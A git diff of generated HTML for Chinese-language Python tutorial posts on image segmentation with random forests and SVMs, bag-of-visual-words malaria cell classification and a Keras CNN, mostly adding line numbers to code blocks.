                      # Add pixel values to the data frame
                      label_values = label.reshape(-1)
                      df2['Label_Value'] = label_values
                      df2['Mask_Name'] = mask

                      mask_dataset = mask_dataset.append(df2) # Update mask dataframe with all the info from each mask
                      • STEP 3: GET DATA READY FOR RANDOM FOREST (or other classifier) COMBINE BOTH DATAFRAMES INTO A SINGLE DATASET
                      -
                      dataset = pd.concat([image_dataset, mask_dataset], axis=1)  # Concatenate both image and mask datasets

                      # If you expect image and mask names to be the same this is where we can perform sanity check
                      # dataset['Image_Name'].equals(dataset['Mask_Name'])
                      # If we do not want to include pixels with value 0
                      # e.g. Sometimes unlabeled pixels may be given a value 0.
                      dataset = dataset[dataset.Label_Value != 0]

                      # Assign training features to X and labels to Y
                      # Drop columns that are not relevant for training (non-features)
                      X = dataset.drop(labels = ["Image_Name", "Mask_Name", "Label_Value"], axis=1)

                      # Assign label values to Y (our prediction)
                      Y = dataset["Label_Value"].values

                      # Split data into train and test to verify accuracy after fitting the model.
                      from sklearn.model_selection import train_test_split
                      X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=0.2, random_state=20)
                      +
                      1
                      2
                      3
                      4
                      5
                      6
                      7
                      8
                      9
                      10
                      11
                      12
                      13
                      14
                      15
                      16
                      17
                      18
                      dataset = pd.concat([image_dataset, mask_dataset], axis=1)  # Concatenate both image and mask datasets

                      # If you expect image and mask names to be the same this is where we can perform sanity check
                      # dataset['Image_Name'].equals(dataset['Mask_Name'])
                      # If we do not want to include pixels with value 0
                      # e.g. Sometimes unlabeled pixels may be given a value 0.
                      dataset = dataset[dataset.Label_Value != 0]

                      # Assign training features to X and labels to Y
                      # Drop columns that are not relevant for training (non-features)
                      X = dataset.drop(labels = ["Image_Name", "Mask_Name", "Label_Value"], axis=1)

                      # Assign label values to Y (our prediction)
                      Y = dataset["Label_Value"].values

                      # Split data into train and test to verify accuracy after fitting the model.
                      from sklearn.model_selection import train_test_split
                      X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=0.2, random_state=20)
                      • STEP 4: Define the classifier and fit a model with our training data
                      -
                      # Import training classifier
                      from sklearn.ensemble import RandomForestClassifier
                      # Instantiate model with n number of decision trees
                      model = RandomForestClassifier(n_estimators = 50, random_state = 42)

                      # Train the model on training data
                      model.fit(X_train, y_train)
                      +
                      1
                      2
                      3
                      4
                      5
                      6
                      7
                      # Import training classifier
                      from sklearn.ensemble import RandomForestClassifier
                      # Instantiate model with n number of decision trees
                      model = RandomForestClassifier(n_estimators = 50, random_state = 42)

                      # Train the model on training data
                      model.fit(X_train, y_train)
                      • STEP 5: Accuracy check
                      -
                      from sklearn import metrics

                      prediction_test = model.predict(X_test)
                      # Check accuracy on test dataset.
                      print("Accuracy = ", metrics.accuracy_score(y_test, prediction_test))
                      +
                      1
                      2
                      3
                      4
                      5
                      from sklearn import metrics

                      prediction_test = model.predict(X_test)
                      # Check accuracy on test dataset.
                      print("Accuracy = ", metrics.accuracy_score(y_test, prediction_test))
                      • STEP 6: SAVE MODEL FOR FUTURE USE
                      -
                      # You can store the model for future use. In fact, this is how you do machine elarning
                      # Train on training images, validate on test images and deploy the model on unknown images.
                      # Save the trained model as pickle string to disk for future use
                      model_name = "sandstone_model"
                      pickle.dump(model, open(model_name, 'wb'))
                      +
                      1
                      2
                      3
                      4
                      5
                      # You can store the model for future use. In fact, this is how you do machine elarning
                      # Train on training images, validate on test images and deploy the model on unknown images.
                      # Save the trained model as pickle string to disk for future use
                      model_name = "sandstone_model"
                      pickle.dump(model, open(model_name, 'wb'))
                      @@ -5324,6 +5322,8 @@

                      目录

                      var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/DIP-Python tutorials for image processing and machine learning(68)-SVM/index.html b/posts/DIP-Python tutorials for image processing and machine learning(68)-SVM/index.html index 8dae430f4a..0c4d2c8582 100644 --- a/posts/DIP-Python tutorials for image processing and machine learning(68)-SVM/index.html +++ b/posts/DIP-Python tutorials for image processing and machine learning(68)-SVM/index.html @@ -44,8 +44,6 @@ - - @@ -644,16 +642,16 @@

                      shape_fit_: tuple of int of shape (n_dimensions_of_X,)
                      Array dimensions of training vector X.

                      68b - SVM vs. Random Forest for image segmentation

                      -
                      import numpy as np
                      import cv2
                      import pandas as pd

                      img = cv2.imread('images/Train_images/Sandstone_Versa0000.tif')
                      img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
                      img2 = img.reshape(-1)
                      df = pd.DataFrame()
                      df['Original Image'] = img2

                      # Generate Gabor features
                      num = 1
                      kernels = []
                      for theta in range(2):
                      theta = theta / 4. * np.pi
                      for sigma in (1, 3):
                      for lamda in np.arange(0, np.pi, np.pi / 4):
                      for gamma in (0.05, 0.5):
                      gabor_label = 'Gabor' + str(num)
                      ksize=9
                      kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, 0, ktype=cv2.CV_32F)
                      kernels.append(kernel)
                      fimg = cv2.filter2D(img2, cv2.CV_8UC3, kernel)
                      filtered_img = fimg.reshape(-1)
                      df[gabor_label] = filtered_img
                      num += 1
                      # CANNY EDGE
                      edges = cv2.Canny(img, 100,200)
                      edges1 = edges.reshape(-1)
                      df['Canny Edge'] = edges1

                      from skimage.filters import roberts, sobel, scharr, prewitt

                      # ROBERTS EDGE
                      edge_roberts = roberts(img)
                      edge_roberts1 = edge_roberts.reshape(-1)
                      df['Roberts'] = edge_roberts1

                      # SOBEL
                      edge_sobel = sobel(img)
                      edge_sobel1 = edge_sobel.reshape(-1)
                      df['Sobel'] = edge_sobel1

                      # SCHARR
                      edge_scharr = scharr(img)
                      edge_scharr1 = edge_scharr.reshape(-1)
                      df['Scharr'] = edge_scharr1

                      # PREWITT
                      edge_prewitt = prewitt(img)
                      edge_prewitt1 = edge_prewitt.reshape(-1)
                      df['Prewitt'] = edge_prewitt1

                      # GAUSSIAN with sigma=3
                      from scipy import ndimage as nd

                      gaussian_img = nd.gaussian_filter(img, sigma=3)
                      gaussian_img1 = gaussian_img.reshape(-1)
                      df['Gaussian s3'] = gaussian_img1

                      # GAUSSIAN with sigma=7
                      gaussian_img2 = nd.gaussian_filter(img, sigma=7)
                      gaussian_img3 = gaussian_img2.reshape(-1)
                      df['Gaussian s7'] = gaussian_img3

                      # MEDIAN with sigma=3
                      median_img = nd.median_filter(img, size=3)
                      median_img1 = median_img.reshape(-1)
                      df['Median s3'] = median_img1

                      # VARIANCE with size=3
                      variance_img = nd.generic_filter(img, np.var, size=3)
                      variance_img1 = variance_img.reshape(-1)
                      df['Variance s3'] = variance_img1

                      ######################################

                      # Now, add a column in the data frame for the Labels
                      # For this, we need to import the labeled image
                      labeled_img = cv2.imread('images/Train_masks/Sandstone_Versa0000.tif')
                      # Remember that you can load an image with partial labels
                      # But, drop the rows with unlabeled data

                      labeled_img = cv2.cvtColor(labeled_img, cv2.COLOR_BGR2GRAY)
                      labeled_img1 = labeled_img.reshape(-1)
                      df['Labels'] = labeled_img1

                      #########################################################

                      # Define the dependent variable that needs to be predicted (labels)
                      Y = df["Labels"].values

                      # Define the independent variables
                      X = df.drop(labels = ["Labels"], axis=1)

                      # Split data into train and test to verify accuracy after fitting the model.
                      from sklearn.model_selection import train_test_split
                      X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.4, random_state=20)
                      -
                      from sklearn.svm import LinearSVC

                      model = LinearSVC(max_iter=100)
                      model.fit(X_train, Y_train)
                      prediction_test = model.predict(X_test)
                      +
                      1
                      2
                      3
                      4
                      5
                      6
                      7
                      8
                      9
                      10
                      11
                      12
                      13
                      14
                      15
                      16
                      17
                      18
                      19
                      20
                      21
                      22
                      23
                      24
                      25
                      26
                      27
                      28
                      29
                      30
                      31
                      32
                      33
                      34
                      35
                      36
                      37
                      38
                      39
                      40
                      41
                      42
                      43
                      44
                      45
                      46
                      47
                      48
                      49
                      50
                      51
                      52
                      53
                      54
                      55
                      56
                      57
                      58
                      59
                      60
                      61
                      62
                      63
                      64
                      65
                      66
                      67
                      68
                      69
                      70
                      71
                      72
                      73
                      74
                      75
                      76
                      77
                      78
                      79
                      80
                      81
                      82
                      83
                      84
                      85
                      86
                      87
                      88
                      89
                      90
                      91
                      92
                      93
                      94
                      95
                      96
                      97
                      98
                      import numpy as np
                      import cv2
                      import pandas as pd

                      img = cv2.imread('images/Train_images/Sandstone_Versa0000.tif')
                      img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
                      img2 = img.reshape(-1)
                      df = pd.DataFrame()
                      df['Original Image'] = img2

                      # Generate Gabor features
                      num = 1
                      kernels = []
                      for theta in range(2):
                      theta = theta / 4. * np.pi
                      for sigma in (1, 3):
                      for lamda in np.arange(0, np.pi, np.pi / 4):
                      for gamma in (0.05, 0.5):
                      gabor_label = 'Gabor' + str(num)
                      ksize=9
                      kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, 0, ktype=cv2.CV_32F)
                      kernels.append(kernel)
                      fimg = cv2.filter2D(img2, cv2.CV_8UC3, kernel)
                      filtered_img = fimg.reshape(-1)
                      df[gabor_label] = filtered_img
                      num += 1
                      # CANNY EDGE
                      edges = cv2.Canny(img, 100,200)
                      edges1 = edges.reshape(-1)
                      df['Canny Edge'] = edges1

                      from skimage.filters import roberts, sobel, scharr, prewitt

                      # ROBERTS EDGE
                      edge_roberts = roberts(img)
                      edge_roberts1 = edge_roberts.reshape(-1)
                      df['Roberts'] = edge_roberts1

                      # SOBEL
                      edge_sobel = sobel(img)
                      edge_sobel1 = edge_sobel.reshape(-1)
                      df['Sobel'] = edge_sobel1

                      # SCHARR
                      edge_scharr = scharr(img)
                      edge_scharr1 = edge_scharr.reshape(-1)
                      df['Scharr'] = edge_scharr1

                      # PREWITT
                      edge_prewitt = prewitt(img)
                      edge_prewitt1 = edge_prewitt.reshape(-1)
                      df['Prewitt'] = edge_prewitt1

                      # GAUSSIAN with sigma=3
                      from scipy import ndimage as nd

                      gaussian_img = nd.gaussian_filter(img, sigma=3)
                      gaussian_img1 = gaussian_img.reshape(-1)
                      df['Gaussian s3'] = gaussian_img1

                      # GAUSSIAN with sigma=7
                      gaussian_img2 = nd.gaussian_filter(img, sigma=7)
                      gaussian_img3 = gaussian_img2.reshape(-1)
                      df['Gaussian s7'] = gaussian_img3

                      # MEDIAN with sigma=3
                      median_img = nd.median_filter(img, size=3)
                      median_img1 = median_img.reshape(-1)
                      df['Median s3'] = median_img1

                      # VARIANCE with size=3
                      variance_img = nd.generic_filter(img, np.var, size=3)
                      variance_img1 = variance_img.reshape(-1)
                      df['Variance s3'] = variance_img1

                      ######################################

                      # Now, add a column in the data frame for the Labels
                      # For this, we need to import the labeled image
                      labeled_img = cv2.imread('images/Train_masks/Sandstone_Versa0000.tif')
                      # Remember that you can load an image with partial labels
                      # But, drop the rows with unlabeled data

                      labeled_img = cv2.cvtColor(labeled_img, cv2.COLOR_BGR2GRAY)
                      labeled_img1 = labeled_img.reshape(-1)
                      df['Labels'] = labeled_img1

                      #########################################################

                      # Define the dependent variable that needs to be predicted (labels)
                      Y = df["Labels"].values

                      # Define the independent variables
                      X = df.drop(labels = ["Labels"], axis=1)

                      # Split data into train and test to verify accuracy after fitting the model.
                      from sklearn.model_selection import train_test_split
                      X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.4, random_state=20)
                      +
                      1
                      2
                      3
                      4
                      5
                      from sklearn.svm import LinearSVC

                      model = LinearSVC(max_iter=100)
                      model.fit(X_train, Y_train)
                      prediction_test = model.predict(X_test)
                      C:\Users\gzjzx\anaconda3\lib\site-packages\sklearn\svm\_base.py:1225: ConvergenceWarning: Liblinear failed to converge, increase the number of iterations.
                         warnings.warn(
                       

                      SVM 的速度要比 随机森林 慢得多

                      -
                      from sklearn import metrics

                      print("Accuracy=", metrics.accuracy_score(Y_test, prediction_test))
                      +
                      1
                      2
                      3
                      from sklearn import metrics

                      print("Accuracy=", metrics.accuracy_score(Y_test, prediction_test))
                      Accuracy= 0.9525666606203519
                       
                      -
                      # You can store the model for future use. In fact, this is how you do machine elarning
                      # Train on training images, validate on test images and deploy the model on unknown images.
                      # 储存训练模型

                      import pickle

                      # Save the trained model as pickle string to disk for future use
                      filename = "sandstone_model"
                      pickle.dump(model, open(filename, 'wb'))

                      # To test the model on future datasets
                      loaded_model = pickle.load(open(filename, 'rb'))
                      result = loaded_model.predict(X)

                      # 将分割结果以图片显示
                      segmented = result.reshape((img.shape))

                      from matplotlib import pyplot as plt

                      plt.imshow(segmented, cmap ='jet')
                      plt.imsave('segmented_rock_RF_100_estim.jpg', segmented, cmap ='jet')
                      +
                      1
                      2
                      3
                      4
                      5
                      6
                      7
                      8
                      9
                      10
                      11
                      12
                      13
                      14
                      15
                      16
                      17
                      18
                      19
                      20
                      21
                      # You can store the model for future use. In fact, this is how you do machine elarning
                      # Train on training images, validate on test images and deploy the model on unknown images.
                      # 储存训练模型

                      import pickle

                      # Save the trained model as pickle string to disk for future use
                      filename = "sandstone_model"
                      pickle.dump(model, open(filename, 'wb'))

                      # To test the model on future datasets
                      loaded_model = pickle.load(open(filename, 'rb'))
                      result = loaded_model.predict(X)

                      # 将分割结果以图片显示
                      segmented = result.reshape((img.shape))

                      from matplotlib import pyplot as plt

                      plt.imshow(segmented, cmap ='jet')
                      plt.imsave('segmented_rock_RF_100_estim.jpg', segmented, cmap ='jet')

                      png

                      虽然这并不意味着支持向量机没用,但我的意思是,对于像素分割,支持向量机可能不是正确的选择,但是如果你有图像分类,支持向量机实际上做得很好。

                      @@ -4690,6 +4688,8 @@

                      目录

                      var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/DIP-Python tutorials for image processing and machine learning(69)-BOVW/index.html b/posts/DIP-Python tutorials for image processing and machine learning(69)-BOVW/index.html index 4db7a99e3d..7a5a088f71 100644 --- a/posts/DIP-Python tutorials for image processing and machine learning(69)-BOVW/index.html +++ b/posts/DIP-Python tutorials for image processing and machine learning(69)-BOVW/index.html @@ -44,8 +44,6 @@ - - @@ -417,21 +415,21 @@

                      https://www.kaggle.com/datasets/iarunava/cell-images-for-detecting-malaria?resource=download

                      Train_BOVW

                      -
                      import cv2
                      import numpy as np
                      import os
                      +
                      1
                      2
                      3
                      import cv2
                      import numpy as np
                      import os
                      • Get the training classes names and store them in a list
                      • Here we use folder names for class names
                      -
                      train_path = 'images/cell_images/train'  # Folder Names are Parasitized and Uninfected
                      training_names = os.listdir(train_path)
                      +
                      1
                      2
                      train_path = 'images/cell_images/train'  # Folder Names are Parasitized and Uninfected
                      training_names = os.listdir(train_path)
                      • Get path to all images and save them in a list
                      • image_paths and the corresponding label(对应标签)in image_paths
                      -
                      image_paths = []
                      image_classes = []
                      class_id = 0
                      +
                      1
                      2
                      3
                      image_paths = []
                      image_classes = []
                      class_id = 0
                      • To make it easy to list all file names in a directory let us define a function
                      -
                      def imglist(path):    
                      return [os.path.join(path, f) for f in os.listdir(path)]
                      +
                      1
                      2
                      def imglist(path):    
                      return [os.path.join(path, f) for f in os.listdir(path)]
                      • Fill the placeholder empty lists with image path, classes, and add class ID number
                          @@ -439,8 +437,8 @@

                          Train_BOVW

                      -
                      for training_name in training_names:
                      dir = os.path.join(train_path, training_name)
                      class_path = imglist(dir)
                      image_paths += class_path
                      image_classes += [class_id] * len(class_path)
                      class_id += 1
                      -
                      image_paths
                      +
                      1
                      2
                      3
                      4
                      5
                      6
                      for training_name in training_names:
                      dir = os.path.join(train_path, training_name)
                      class_path = imglist(dir)
                      image_paths += class_path
                      image_classes += [class_id] * len(class_path)
                      class_id += 1
                      +
                      1
                      image_paths
                      ['images/cell_images/train\\Parasitized\\C37BP2_thinF_IMG_20150620_133111a_cell_87.png',
                        'images/cell_images/train\\Parasitized\\C37BP2_thinF_IMG_20150620_133111a_cell_88.png',
                        'images/cell_images/train\\Parasitized\\C37BP2_thinF_IMG_20150620_133205a_cell_87.png',
                      @@ -465,10 +463,10 @@ 

                      Train_BOVW

                      • 总共两类:Parasitized 寄生,Uninfected 未被感染
                      -
                      image_classes
                      +
                      1
                      image_classes
                      [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
                       
                      -
                      class_id
                      +
                      1
                      class_id
                      2
                       
                        @@ -488,7 +486,7 @@

                        Train_BOVW

                    -
                    des_list = []
                    +
                    1
                    des_list = []

                    OpenCV 尺度不变特征检测:SIFT、SURF、BRISK、ORB

                    • BRISK is a good replacement to SIFT. ORB also works but didn’t work well for this example @@ -497,7 +495,7 @@

                      Train_BOVW

                  -
                  brisk = cv2.BRISK_create(30)
                  for image_path in image_paths:
                  im = cv2.imread(image_path)
                  kpts, des = brisk.detectAndCompute(im, None)
                  des_list.append((image_path, des))
                  +
                  1
                  2
                  3
                  4
                  5
                  brisk = cv2.BRISK_create(30)
                  for image_path in image_paths:
                  im = cv2.imread(image_path)
                  kpts, des = brisk.detectAndCompute(im, None)
                  des_list.append((image_path, des))
                  • Stack all the descriptors vertically in a numpy array
                      @@ -505,7 +503,7 @@

                      Train_BOVW

                  -
                  descriptors = des_list[0][1]
                  for image_path, descriptor in des_list[1:]:
                  descriptors = np.vstack((descriptors, descriptor))
                  descriptors
                  +
                  1
                  2
                  3
                  4
                  descriptors = des_list[0][1]
                  for image_path, descriptor in des_list[1:]:
                  descriptors = np.vstack((descriptors, descriptor))
                  descriptors
                  array([[244, 255, 223, ...,   0,  17,  48],
                          [254, 191, 247, ...,   8,  25,   0],
                          [240, 255, 255, ..., 137,  25,   0],
                  @@ -517,7 +515,7 @@ 

                  Train_BOVW

                  • kmeans works only on float, so convert integers to float
                  -
                  descriptors_float = descriptors.astype(float)
                  +
                  1
                  descriptors_float = descriptors.astype(float)
                  • Perform k-means clustering and vector quantization
                      @@ -526,7 +524,7 @@

                      Train_BOVW

                    这里使用 k-means,也可以使用 SVM 或 随机森林。

                    -
                    from scipy.cluster.vq import kmeans, vq

                    k = 200 # k means with 100 clusters gives lower accuracy for the aeroplane example
                    voc, variance = kmeans(descriptors_float, k, 1)
                    +
                    1
                    2
                    3
                    4
                    from scipy.cluster.vq import kmeans, vq

                    k = 200 # k means with 100 clusters gives lower accuracy for the aeroplane example
                    voc, variance = kmeans(descriptors_float, k, 1)
                    • Calculate the histogram of features and represent them as vector
                        @@ -539,12 +537,12 @@

                        Train_BOVW

                    -
                    im_features = np.zeros((len(image_paths), k), "float32")
                    for i in range(len(image_paths)):
                    words, distance = vq(des_list[i][1],voc)
                    for w in words:
                    im_features[i][w] += 1
                    -
                    words
                    +
                    1
                    2
                    3
                    4
                    5
                    im_features = np.zeros((len(image_paths), k), "float32")
                    for i in range(len(image_paths)):
                    words, distance = vq(des_list[i][1],voc)
                    for w in words:
                    im_features[i][w] += 1
                    +
                    1
                    words
                    array([ 48,  14,  24,  50,  86, 177, 199,  91,  24,  15,  21,  44,  86,
                            192,  71,  46, 193,  59, 154,   2,  80, 119,  43])
                     
                    -
                    distance
                    +
                    1
                    distance
                    array([ 79.62537284,  76.25693411, 150.61976132,   0.        ,
                            189.20699172, 167.46438427,   0.        , 132.3697473 ,
                             95.40341975, 137.6727198 , 113.90895487, 104.85068749,
                    @@ -555,7 +553,7 @@ 

                    Train_BOVW

                    • 执行 Tf-Idf 矢量化
                    -
                    nbr_occurences = np.sum((im_features > 0) * 1, axis=0)
                    idf = np.array(np.log((1.0 * len(image_paths) + 1) / (1.0 * nbr_occurences + 1)), 'float32')
                    +
                    1
                    2
                    nbr_occurences = np.sum((im_features > 0) * 1, axis=0)
                    idf = np.array(np.log((1.0 * len(image_paths) + 1) / (1.0 * nbr_occurences + 1)), 'float32')
                    • Scaling the words standardize features by removing the mean and scaling to unit variance in a way normalization
                        @@ -563,12 +561,12 @@

                        Train_BOVW

                    -
                    from sklearn.preprocessing import StandardScaler
                    stdSlr = StandardScaler().fit(im_features)
                    im_features = stdSlr.transform(im_features)
                    +
                    1
                    2
                    3
                    from sklearn.preprocessing import StandardScaler
                    stdSlr = StandardScaler().fit(im_features)
                    im_features = stdSlr.transform(im_features)
                    • Train an algorithm to discriminate vectors corresponding to positive and negative training images
                    • Train the Linear SVM
                    -
                    from sklearn.svm import LinearSVC
                    clf = LinearSVC(max_iter=10000) # Default of 100 is not converging
                    clf.fit(im_features, np.array(image_classes))
                    +
                    1
                    2
                    3
                    from sklearn.svm import LinearSVC
                    clf = LinearSVC(max_iter=10000) # Default of 100 is not converging
                    clf.fit(im_features, np.array(image_classes))
                    • Save the SVM
                    • Joblib dumps Python object into one file @@ -577,11 +575,11 @@

                      Train_BOVW

                  -
                  import joblib
                  joblib.dump((clf, training_names, stdSlr, k, voc), "bovw.pkl", compress=3)
                  +
                  1
                  2
                  import joblib
                  joblib.dump((clf, training_names, stdSlr, k, voc), "bovw.pkl", compress=3)
                  ['bovw.pkl']
                   

                  Validate_BOVW

                  -
                  import cv2
                  import numpy as np
                  import os
                  import pylab as pl
                  from sklearn.metrics import confusion_matrix, accuracy_score # sreeni
                  import joblib
                  +
                  1
                  2
                  3
                  4
                  5
                  6
                  import cv2
                  import numpy as np
                  import os
                  import pylab as pl
                  from sklearn.metrics import confusion_matrix, accuracy_score # sreeni
                  import joblib
                  • Load the classifier, class names, scaler, number of clusters and vocabulary from stored pickle file (generated during training)
                      @@ -589,7 +587,7 @@

                      Validate_BOVW

                  -
                  clf, classes_names, stdSlr, k, voc = joblib.load("bovw.pkl")
                  +
                  1
                  clf, classes_names, stdSlr, k, voc = joblib.load("bovw.pkl")
                  • instead of test if you use train then we get great accuracy
                      @@ -597,8 +595,8 @@

                      Validate_BOVW

                  -
                  test_path = 'images/cell_images/test'
                  testing_names = os.listdir(test_path)
                  -
                  # Get path to all images and save them in a list
                  # image_paths and the corresponding label in image_paths
                  image_paths = []
                  image_classes = []
                  class_id = 0

                  # To make it easy to list all file names in a directory let us define a function

                  def imglist(path):
                  return [os.path.join(path, f) for f in os.listdir(path)]

                  # Fill the placeholder empty lists with image path, classes, and add class ID number

                  for testing_name in testing_names:
                  dir = os.path.join(test_path, testing_name)
                  class_path = imglist(dir)
                  image_paths+=class_path
                  image_classes+=[class_id]*len(class_path)
                  class_id+=1

                  # Create feature extraction and keypoint detector objects
                  # SIFT is not available anymore in openCV
                  # Create List where all the descriptors will be stored
                  des_list = []

                  # BRISK is a good replacement to SIFT. ORB also works but didn;t work well for this example
                  brisk = cv2.BRISK_create(30)

                  for image_path in image_paths:
                  im = cv2.imread(image_path)
                  kpts, des = brisk.detectAndCompute(im, None)
                  des_list.append((image_path, des))

                  # Stack all the descriptors vertically in a numpy array
                  descriptors = des_list[0][1]
                  for image_path, descriptor in des_list[0:]:
                  descriptors = np.vstack((descriptors, descriptor))

                  # Calculate the histogram of features
                  # vq Assigns codes from a code book to observations.
                  from scipy.cluster.vq import vq
                  test_features = np.zeros((len(image_paths), k), "float32")
                  for i in range(len(image_paths)):
                  words, distance = vq(des_list[i][1],voc)
                  for w in words:
                  test_features[i][w] += 1

                  # Perform Tf-Idf vectorization
                  nbr_occurences = np.sum( (test_features > 0) * 1, axis = 0)
                  idf = np.array(np.log((1.0*len(image_paths)+1) / (1.0*nbr_occurences + 1)), 'float32')

                  # Scale the features
                  # Standardize features by removing the mean and scaling to unit variance
                  # Scaler (stdSlr comes from the pickled file we imported)
                  test_features = stdSlr.transform(test_features)
                  +
                  1
                  2
                  test_path = 'images/cell_images/test'
                  testing_names = os.listdir(test_path)
                  +
                  1
                  2
                  3
                  4
                  5
                  6
                  7
                  8
                  9
                  10
                  11
                  12
                  13
                  14
                  15
                  16
                  17
                  18
                  19
                  20
                  21
                  22
                  23
                  24
                  25
                  26
                  27
                  28
                  29
                  30
                  31
                  32
                  33
                  34
                  35
                  36
                  37
                  38
                  39
                  40
                  41
                  42
                  43
                  44
                  45
                  46
                  47
                  48
                  49
                  50
                  51
                  52
                  53
                  54
                  55
                  # Get path to all images and save them in a list
                  # image_paths and the corresponding label in image_paths
                  image_paths = []
                  image_classes = []
                  class_id = 0

                  # To make it easy to list all file names in a directory let us define a function

                  def imglist(path):
                  return [os.path.join(path, f) for f in os.listdir(path)]

                  # Fill the placeholder empty lists with image path, classes, and add class ID number

                  for testing_name in testing_names:
                  dir = os.path.join(test_path, testing_name)
                  class_path = imglist(dir)
                  image_paths+=class_path
                  image_classes+=[class_id]*len(class_path)
                  class_id+=1

                  # Create feature extraction and keypoint detector objects
                  # SIFT is not available anymore in openCV
                  # Create List where all the descriptors will be stored
                  des_list = []

                  # BRISK is a good replacement to SIFT. ORB also works but didn;t work well for this example
                  brisk = cv2.BRISK_create(30)

                  for image_path in image_paths:
                  im = cv2.imread(image_path)
                  kpts, des = brisk.detectAndCompute(im, None)
                  des_list.append((image_path, des))

                  # Stack all the descriptors vertically in a numpy array
                  descriptors = des_list[0][1]
                  for image_path, descriptor in des_list[0:]:
                  descriptors = np.vstack((descriptors, descriptor))

                  # Calculate the histogram of features
                  # vq Assigns codes from a code book to observations.
                  from scipy.cluster.vq import vq
                  test_features = np.zeros((len(image_paths), k), "float32")
                  for i in range(len(image_paths)):
                  words, distance = vq(des_list[i][1],voc)
                  for w in words:
                  test_features[i][w] += 1

                  # Perform Tf-Idf vectorization
                  nbr_occurences = np.sum( (test_features > 0) * 1, axis = 0)
                  idf = np.array(np.log((1.0*len(image_paths)+1) / (1.0*nbr_occurences + 1)), 'float32')

                  # Scale the features
                  # Standardize features by removing the mean and scaling to unit variance
                  # Scaler (stdSlr comes from the pickled file we imported)
                  test_features = stdSlr.transform(test_features)
                  • Until here most of the above code is similar to Train excerpt for kmeans clustering
                  @@ -610,7 +608,7 @@

                  Validate_BOVW

              -
              true_class = [classes_names[i] for i in image_classes]
              +
              1
              true_class = [classes_names[i] for i in image_classes]
              • Perform the predictions and report predicted class names.
                  @@ -618,24 +616,24 @@

                  Validate_BOVW

              -
              predictions = [classes_names[i] for i in clf.predict(test_features)]
              +
              1
              predictions = [classes_names[i] for i in clf.predict(test_features)]
              • Print the true class and Predictions
              -
              print ("true_class =" + str(true_class))
              print ("prediction =" + str(predictions))
              +
              1
              2
              print ("true_class =" + str(true_class))
              print ("prediction =" + str(predictions))
              true_class =['Parasitized', 'Parasitized', 'Parasitized', 'Parasitized', 'Parasitized', 'Parasitized', 'Parasitized', 'Parasitized', 'Parasitized', 'Parasitized', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected']
               prediction =['Parasitized', 'Parasitized', 'Uninfected', 'Parasitized', 'Uninfected', 'Parasitized', 'Uninfected', 'Uninfected', 'Parasitized', 'Uninfected', 'Parasitized', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected']
               
              • To make it easy to understand the accuracy let us print the confusion matrix
              -
              def showconfusionmatrix(cm):
              pl.matshow(cm)
              pl.title('Confusion matrix')
              pl.colorbar()
              pl.show()
              -
              accuracy = accuracy_score(true_class, predictions)
              print ("accuracy = ", accuracy)
              cm = confusion_matrix(true_class, predictions)
              print (cm)
              +
              1
              2
              3
              4
              5
              def showconfusionmatrix(cm):
              pl.matshow(cm)
              pl.title('Confusion matrix')
              pl.colorbar()
              pl.show()
              +
              1
              2
              3
              4
              accuracy = accuracy_score(true_class, predictions)
              print ("accuracy = ", accuracy)
              cm = confusion_matrix(true_class, predictions)
              print (cm)
              accuracy =  0.7
               [[5 5]
                [1 9]]
               
              -
              showconfusionmatrix(cm)
              +
              1
              showconfusionmatrix(cm)


              png

              @@ -4672,6 +4670,8 @@

              目录

              var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/DIP-Python tutorials for image processing and machine learning(70-71)-Deep Learning/index.html b/posts/DIP-Python tutorials for image processing and machine learning(70-71)-Deep Learning/index.html index 8d72fb25ce..05b731890b 100644 --- a/posts/DIP-Python tutorials for image processing and machine learning(70-71)-Deep Learning/index.html +++ b/posts/DIP-Python tutorials for image processing and machine learning(70-71)-Deep Learning/index.html @@ -44,8 +44,6 @@ - - @@ -410,7 +408,7 @@

              png

              卷积层和池化层可以有很多层。

              png

              -
              INPUT_SHAPE =(64,64,3) #change to (SIZE, SIZE, 3)
              inp = keras.layersInput(shape=INPUT SHAPE)
              conv1 = keras.layers.Conv2D(32, kernel_size=(3, 3), activation='relu', padding='same')(inp)
              pool1 = keras.layers.MaxPooling2D(pool size=(2, 2))(conv1)
              norm1 = keras.layers.BatchNormalization(axis=-1)(pool1)
              drop1 = keras.layers.Dropout(rate=0.2)(norm1)
              conv2 = keras.layers.Conv2D(32, kernel_size=(3, 3), activation='relu', padding='same')(drop1)
              pool2 = keras.layers.MaxPooling2D(poo size=(2, 2))(conv2)
              norm2 = keras.layers.BatchNormalization(axis = -1)(pool2)
              drop2 = keras.layers.Dropout(rate=0.2)(norm2)
              flat = keras.layers.Flatten()(drop2)
              hidden1 = keras.layers.Dense(512, activation='relu')(flat)
              norm3 = keras.layers.BatchNormalization(axis = -1)(hidden1)
              drop3 = keras.layers.Dropout(rate=0.2)(norm3)
              hidden2 = keras.layers.Dense(256, activation='relu')(drop3)
              norm4 = keras.layers.BatchNormalization(axis = -1)(hidden2)
              drop4 = keras.layers.Dropout(rate=0.2)(norm4)

              out = keras.layers.Dense(2, activation='sigmoid')(drop4) # units=1gives error
              model = keras.Model(inputs=inp, outputs=out)model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])
              +
              1
              2
              3
              4
              5
              6
              7
              8
              9
              10
              11
              12
              13
              14
              15
              16
              17
              18
              19
              20
              INPUT_SHAPE =(64,64,3) #change to (SIZE, SIZE, 3)
              inp = keras.layersInput(shape=INPUT SHAPE)
